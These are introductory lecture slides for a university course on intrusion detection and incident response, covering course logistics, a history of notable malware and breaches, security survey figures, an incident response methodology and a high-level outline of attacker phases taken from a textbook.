Add to collection(s) Add to saved
  1. Business
  2. Finance

Lesson 1

advertisement 
Lesson 1
Course Introduction
Overview
• Course Administrivia
• Info Assurance Review
• Incident Response
UTSA IS 3523 ID & Incident Response
IS3523 Intrusion Detection
and
Incident Response
• 6:00-7:15 PM M/W
• Robert Kaufman
– Background
– Contact information
• Syllabus and Class Schedule
• Student Background Information
– Email
UTSA IS 3523 ID & Incident Response
Student Information
• Name
• Reliable email address
• Email to robkaufmaniii@sbcglobal.net
UTSA IS 3523 ID & Incident Response
Text Books
• Course Text:
– Incident Response and Computer Forensics Mandia, Kevin
and Prosise, Chris, Osborne/McGraw Hill Publishing,
2013. ISBN 978‐0072226966
• Additional References:
– Principles of Computer Security, Conklin, White, Cothren,
Williams, and Davis
– Hacking Exposed, by McClure, Scambray, Kurtz
– Cyber crime Investigator’s Field Guide, by Bruce Middleton
UTSA IS 3523 ID & Incident Response
Grading
• Grades
– 2 Tests
– Final
– Many Projects/Labs
UTSA IS 3523 ID & Incident Response
A Sampling of Malicious Activity
•
•
•
•
•
•
•
•
March 1999 - EBay gets hacked
March 1999 - Melissa virus hits Internet
April 1999 - Chernobyl Virus hits
May 1999 - Hackers shut down web sites of FBI, Senate, a
DOE
June 1999 - Worm.Explore.Zip virus hits
July 1999 - Cult of the Dead Cow (CDC) releases Back
Orifice
Sept 1999 - Hacker pleads guilty to attacking NATO and
Gore web sites
Oct 1999 - Teenage hacker admits to breaking into AOL
A Sampling of Malicious Activity
• Nov 1999 - BubbleBoy virus hits
• Dec 1999 - Babylonia virus spreads
• Feb 2000 - Several sites experience DOS
attacks
• Feb 2000 - Alaska Airlines site hacked
• May 2000 - Love Bug virus ravages net
• July 2001 – Code Red Runs Rampant
• Sept 2001 – Nimda Explodes
A Sampling of Malicious Activity
•
•
•
•
•
•
•
•
•
Jan 2003 – Sapphire/Slammer Worm
Aug 2003 – Blaster (LoveSan) Worm
Jan 2004 – MyDoom
Mar 2004 – Witty Worm
May 2004 – Sasser Worm
Dec 2006 – TJX Credit/Debit Card Theft
Jan 2007 – Storm Worm
Mar 2009 - Conficker
June 2010 - Stuxnet
http://en.wikipedia.org/wiki/Timeline_of_notable_computer_viruses_and_worms
Computer Crime
• Surveys of Computer Crime
– CSI/FBI
– NCSA/ICSA Labs (survey of computer virus incidents)
– CERT-CC Summaries
• Computer Criminals
– Varied skills, background, motives
• What is a computer crime?
– Is breaking into a system without theft, vandalism, or
obvious breach of confidentiality a crime?
• Who are you asking – Law Enforcement? Hacker?
• How does this apply to virus writers?
Nature of the Threat
• WHAT is an attack?
• WHO is attacking (or may attack)?
• WHY are they attacking (or why would they)?
Methodology:
• Historical understanding (based on writings
AND actions)
• Threat = capability + intent
12
Mandiant APT 1
2006
2007
2008
2009
2010
2011
2012
Information
Information Technology
Transportation
High Tech Electronics
Financial Services
Navigation
Legal Services
Engineering Services
Media, Advertising, & Entertainment
Food and Agriculture
Satellites & Telecommunications
Chemicals
Energy
International Organizations
Scientific Research and Consulting
Public Adminstration
Construction & Manufacturing
13
Noteable SQL Injection Breaches
2013
Fed Resv
4000
LivingSocial
FBI/NASA
50,000,000
2012
Domino’s
Pizza
37,000
2011
1,600,000
GlobalPayments
$92,000,000
Diner’s
Club
500,000
2007
100,000
Gamingo
11,000,000 Ingenicard
$9,000,000
Sony
Playstation
7,000,000
Sony
Pictures
1,000,000
Dexia Bank
1,700,000
TJX
47,000,000
LinkedIn
6,500,000
VISA
(Jordan)
800,000
Yahoo
450,000
2010
2009
Fed Gov’t
Target?
70,000,000
Adobe
150,000
$254M loss
Heartland
130,000,000
Hannaford
4,200,000
$455M loss
Source: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
Source: codecurmudgeon.com/wp/sql-injection-hall-of-shame
14
Notable Recent Activity
•
•
•
•
•
•
SONY Hack
Anthem – Medical Data
$1B Worldwide Bank Heist
Target
Heartland Systems (aka TJ Max Credit Cards)
Traffic reroutes (RussiaChina,
ChinaBelarus)
• Venom--for “virtualized environment neglected
operations manipulation,” shatters myth of
cloud security
A Sampling of Malicious Activity
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
March 1999 - EBay gets hacked
March 1999 - Melissa virus hits Internet
April 1999 - Chernobyl Virus hits
May 1999 - Hackers shut down web sites of FBI, Senate, and DOE
June 1999 - Worm.Explore.Zip virus hits
July 1999 - Cult of the Dead Cow (CDC) releases Back Orifice
Sept 1999 - Hacker pleads guilty to attacking NATO and Gore web sites
Oct 1999 - Teenage hacker admits to breaking into AOL
Nov 1999 - BubbleBoy virus hits
Dec 1999 - Babylonia virus spreads
Feb 2000 - Several sites experience DOS attacks
Feb 2000 - Alaska Airlines site hacked
May 2000 - Love Bug virus ravages net
July 2001 – Code Red Runs Rampant
Sept 2001 – Nimda Explodes
Jan 2003 – Slammer Worm
You have to have security, or
else…
•
2001 CSI/FBI Computer Crime and Security Survey
– 538 security “practitioners” in the U.S.
• 91% reported computer security breaches within the previous 12
months
• 70% reported their Internet connection as a frequent point of
attack (up from 59% in 2000)
• 64% suffered financial losses due to breaches, 35% could quantify
this loss.
• Losses due to computer security breaches totaled (for the 186
respondents reporting a loss) $377,828,700
• Average loss $2,031,337
– Source: Computer Security Institute http://www.gocsi.com
UTSA IS 3523 ID & Incident Response
And the hits just keep coming…
•
2002 CSI/FBI Computer Crime & Security Survey
– 503 security “practitioners” in the U.S.
• 90% detected computer security breaches
• 40% detected penetrations from the outside
• 80% acknowledged financial losses due to breaches
• $455,848,000 in losses due to computer security breaches totaled (for the
223 respondents reporting a loss)
• 26 reported theft of proprietary info ($170,827,000)
• 25 reported financial fraud ($115,753,000)
• 34% reported intrusions to law enforcement
• 78% detected employee abuse of internet access privileges, i.e.
pornography and inappropriate email use
– Source: Computer Security Institute http://www.gocsi.com
UTSA IS 3523 ID & Incident Response
And coming
• A 2003 FBI/CSI Computer Crime and Security Survey
revealed the following:
–
–
–
–
–
–
–
–
–
60% had a security breach in the last year.
78% detected employee abuse of internet privileges.
85% admitted to being infected by a computer virus.
Average loss from insider access was $300,000
Average loss due to virus attack $283,000
Average loss from Telecom eavesdropping is $1,205,000
Average loss from outsider penetration was $226,000
The average reported loss from net abuse was $536,000
Source: Computer Security Institute http://www.gocsi.com
UTSA IS 3523 ID & Incident Response
Internet Security Software Market
2002 - $7.4 Billion est.
1999 - $4.2 Billion
1998 - $3.1 Billion
1997 - $2 Billion
’97 & ’98 figures based on a study released by market research firm International Data Corp. in Framingham, Mass.
’99 & ’02 figures from IDC study based on a survey of 300 companies with more than $100 million in annual revenues
UTSA IS 3523 ID & Incident Response
DISA VAAP Results
P
R
O
T
38,000
E
Attacks
C
T
I
13,300 O
Blocked N
24,700
Succeed
988
Detected
UTSA IS 3523 ID & Incident Response
D
E
T
E
C
T
I
O
N
R
E
267
Reported A
C
T
I
O
23,712
Undetected N
721 Not
Reported
Computer Security
The Prevention and/or detection
of unauthorized actions by users
of a computer system.
In the beginning, this meant ensuring privacy on shared systems.
Today, interesting aspect of security is in enabling different
access levels.
UTSA IS 3523 ID & Incident Response
What are our goals in Security?
• The “CIA” of security
– Confidentiality
– Integrity
• Data integrity
• Software Integrity
– Availability
• Accessible and usable on demand
– (authentication)
– (nonrepudiation)
UTSA IS 3523 ID & Incident Response
The “root” of the problem
• Most security problems can be grouped into one of
the following categories:
– Network and host misconfigurations
• Lack of qualified people in the field
– Operating system and application flaws
• Deficiencies in vendor quality assurance efforts
• Lack of qualified people in the field
• Lack of understanding of/concern for security
UTSA IS 3523 ID & Incident Response
Computer Security Operational Model
Protection = Prevention + (Detection + Response)
Access Controls
Encryption
Firewalls
UTSA IS 3523 ID & Incident Response
Intrusion Detection
Incident Handling
Proactive –vs- Reactive Models
• “Most organizations only react to security
threats, and, often times, those reactions come
after the damage has already been done.”
• “The key to a successful information security
program resides in taking a pro-active stance
towards security threats, and attempting to
eliminate vulnerability points before they can
be used against you.”
UTSA IS 3523 ID & Incident Response
So What Happens When
Computer Security Fails?
• Incident Response Methodology--7 Step Process
– Preparation: Proactive Computer Security
– Detection of Incidents
– Initial Response
– Formulate Response Strategy
– Investigate the Incident
– Reporting
– Resolution
UTSA IS 3523 ID & Incident Response
7 Components of Incident Response
Investigate the Incident
Pre-Incident
Preparation
Detection
of
Incidents
Initial
Response
Formulate
Response
Strategy
Data
Collection
Data
Analysis
Reporting
Resolution
Recovery
Implement Security Measures
UTSA IS 3523 ID & Incident Response
Page 15, Fig 2-1, Mandia 2nd Edition
Pre-Incident Preparation
Detection of Incidents
Notification Checklist Completed
Incident Response Team Formed
Initial Response
Is it really
an Incident?
No
Yes
Formulate Response Strategy
Pursue and
accumulate
evidence and/or
secure system
Secure System
Can Pursue Both Paths
Simultaneously
Accumulate Evidence
Yes
Forensic Duplication
Forensic
duplication?
No
Investigation
Implement Security Measures
Perform Network Monitoring
Isolate and Contain
Reporting
Follow-Up
Page 18, Fig 2-1, Mandia 1st Edition
Resources in the Fight
• SANS
• CERT CC
• FIRST
• DOE CIAC
• CERIAS
• NIST
UTSA IS 3523 ID & Incident Response
SANS
• System Administration, Networking, and
Security (SANS) Institute
• Global Incident Analysis Center
• Security Alerts, Updates, & Education
• NewsBites, Security Digest, Windows
Digest
• Certification
•
http://www.sans.org/
UTSA IS 3523 ID & Incident Response
Carnegie Mellon CERT CC
• Computer Emergency Response
Team Coordination Center
• Started by DARPA
• Alerts & Response Services
• Training and CERT Standup
• Clearing House
• http://www.cert.org
UTSA IS 3523 ID & Incident Response
FIRST
• Forum of Incident Response and Security
Teams
• Established 1988
• Govt & Private Sector Membership
• Over 70 Members
• Coordinate Global Response
•
http://www.first.org
UTSA IS 3523 ID & Incident Response
DOE CIAC
• Computer Incident Advisory Capability
• Established 1989
• Part of Lawrence Livermore Lab
• Awareness training and education
• Trend, threat, vulnerability data collection and
analysis
•
http://ciac.llnl.gov/
UTSA IS 3523 ID & Incident Response
CERIAS
• Center for Education and Research in
Information Assurance and Security
• Home of Gene Spafford
• A "University Center"
• InfoSec Research & Education
• Members: Academia, Govt, & Industry
• http://www.cerias.purdue.edu/coast/)
UTSA IS 3523 ID & Incident Response
NIST
• National Institute of Science and Technology
(NIST)
• Operares Computer Security
Resource Clearinghouse (CSRC)
• Raising Awarenss
• Multiple Disciplines
• Main Source of Fed Govt Standards
• http://csrc.ncsl.nist.gov/
UTSA IS 3523 ID & Incident Response
So How Many Vulnerabilties
Are Out?
Lets See What the CERT CC
Says.
UTSA IS 3523 ID & Incident Response
UTSA IS 3523 ID & Incident Response
UTSA IS 3523 ID & Incident Response
UTSA IS 3523 ID & Incident Response
UTSA IS 3523 ID & Incident Response
UTSA IS 3523 ID & Incident Response
History Lesson
The Art of War, Sun Tzu
Lesson for you
• Know the enemy
• Know yourself…and in a 100 battles you
will never be defeated
• If ignorant both of your enemy and of
yourself you are certain in every battle to
be in peril
UTSA IS 3523 ID & Incident Response
History Lesson
The Art of War, Sun Tzu
Lesson for the Hacker
• Probe him and learn where his strength is
abundant and where deficient
• To subdue the enemy without fighting is
the acme of skill
• One able to gain victory by modifying his
tactics IAW with enemy situation may be
said to be divine
UTSA IS 3523 ID & Incident Response
Hacker Attacks
•
•
•
•
Intent is for you to know your enemy
Not intended to make you a hacker
Need to know defensive techniques
Need to know where to start recovery
process
• Need to assess extent of investigative
environment
UTSA IS 3523 ID & Incident Response
Anatomy of a Hack
FOOTPRINTING
GAINING ACCESS
DENIAL
OF
SERVICE
UTSA IS 3523 ID & Incident Response
SCANNING
ESCALATING
PRIVILEGE
CREATING
BACKDOORS
ENUMERATION
PILFERING
COVERING
TRACKS
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Footprinting
Objective
Technique
• Target Address
Range
• Acquire
Namespace
• Information
Gathering
• Surgical Attack
• Don’t Miss Details
• Open Source Search
• whois
• Web Interface to
whois
• ARIN whois
• DNS Zone Transfer
UTSA IS 3523 ID & Incident Response
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Scanning
Objective
• Bulk target
assessment
• Determine
Listening Services
• Focus attack vector
UTSA IS 3523 ID & Incident Response
Technique
• Ping Sweep
• TCP/UDP Scan
• OS Detection
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Enumeration
Objective
• Intrusive Probing
Commences
• Identify valid
accounts
• Identify poorly
protected shares
UTSA IS 3523 ID & Incident Response
Technique
• List user accounts
• List file shares
• Identify applications
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Gaining Access
Objective
• Informed attempt
to access target
• Typically User level
access
UTSA IS 3523 ID & Incident Response
Technique
• Password sniffing
• File share brute
forcing
• Password file grab
• Buffer overflows
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Escalating Privilege
Objective
• Gain Root level
access
Technique
• Password cracking
• Known exploits
UTSA IS 3523 ID & Incident Response
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Pilfering
Objective
• Info gathering to
access trusted
systems
UTSA IS 3523 ID & Incident Response
Technique
• Evaluate trusts
• Search for cleartext
passwords
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Cover Tracks
Objective
• Ensure highest
access
Technique
• Clear logs
• Hide tools
• Hide access from
system
administrator or
owner
UTSA IS 3523 ID & Incident Response
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Creating Back Doors
Objective
• Deploy trap doors
• Ensure easy return
access
UTSA IS 3523 ID & Incident Response
Technique
• Create rogue user
accounts
• Schedule batch jobs
• Infect startup files
• Plant remote control
services
• Install monitors
• Trojanize
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Denial of Service
Objective
• If unable to
escalate privilege
then kill
• Build DDOS
network
UTSA IS 3523 ID & Incident Response
Technique
• SYN Flood
• ICMP Attacks
• Identical src/dst SYN
requests
• Out of bounds TCP
options
• DDOS
Source: Hacking Exposed, McClure, Sacmbray, and Kurtz
Hacker Exploits per SANS
RECONNAISSANCE
EXPLOIT SYSTEMS
UTSA IS 3523 ID & Incident Response
SCANNING
KEEPING
ACCESS
Source: SANs Institute
COVER
TRACKS
Hacking Summary
•
•
•
•
•
Threat: Hacking on the rise
Security posture usually reactive
Losses increasing
7 Step Process
Hacker Techniques
UTSA IS 3523 ID & Incident Response
Related documents
An Introduction to R and Statistics for Neuroscientists
An Introduction to R and Statistics for Neuroscientists
Expanded abstract
Expanded abstract
Critically incident technique The Critical Incident Technique (or CIT
Critically incident technique The Critical Incident Technique (or CIT
Credit-No Credit Grade Option - The University of Texas at San
Credit-No Credit Grade Option - The University of Texas at San
Blackboard Learn 9.1 - Course Copy
Blackboard Learn 9.1 - Course Copy
Junior Achievement and UTSA - The University of Texas at San
Junior Achievement and UTSA - The University of Texas at San
Near Miss Incident Reporting and Investigation
Near Miss Incident Reporting and Investigation
Download
advertisement